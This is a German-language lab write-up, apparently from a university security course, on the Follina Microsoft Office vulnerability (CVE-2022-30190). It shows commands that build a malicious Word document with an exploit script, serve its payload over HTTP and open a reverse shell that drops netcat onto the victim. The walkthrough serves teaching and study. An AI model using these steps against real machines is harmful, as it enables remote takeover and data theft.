
Follina (CVE-2022-30190) ist eine kürzlich entdeckte Zero-Day-Schwachstelle in Microsoft Office. Es handelt sich um eine Schwachstelle mit hohem Schweregrad, die Hacker für Angriffe zur Remote-Codeausführung (RCE) ausnutzen können.
Amine TITROFINE | 17. Dezember 2022
Follina (CVE-2022-30190) ist eine kürzlich entdeckte Microsoft Office Zero-Day-Sicherheitslücke. Es handelt sich um eine Schwachstelle mit hohem Schweregrad, die von Hackern für Remote-Code-Ausführungsangriffe (RCE) ausgenutzt werden kann. Sie tritt auf, wenn MSDT über das URL-Protokoll von einer aufrufenden Anwendung wie Word aufgerufen wird. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, kann beliebigen Code mit den Berechtigungen der aufrufenden Anwendung ausführen. Der Angreifer kann dann Programme installieren, Daten anzeigen, ändern oder löschen oder neue Konten im Rahmen der Benutzerrechte erstellen.
2 VMs :
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
Nach dem Ausführen des Programms follina.py erscheint eine Datei ( follina.doc ), die ein bösartiges Skript enthält .
Um das Teilen von Dateien zwischen den beiden VMs zu erleichtern, verwenden wir einen Python-HTTP-Server.
$ python3 –m http.server 8080
Holen Sie sich eine Reverse-Shell auf Port 9999. Hinweis: Dies lädt eine Netcat-Binärdatei auf das Opfer herunter und platziert sie in C:\Windows\Tasks. Es bereinigt die Binärdatei nicht. Dies wird Antivirus-Erkennungen auslösen, sofern Antivirus nicht deaktiviert ist.
$ python3 follina.py -r 9999
Öffnen Sie calc.exe:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
Öffnen Sie notepad.exe:
$ python3 follina.py -c "notepad"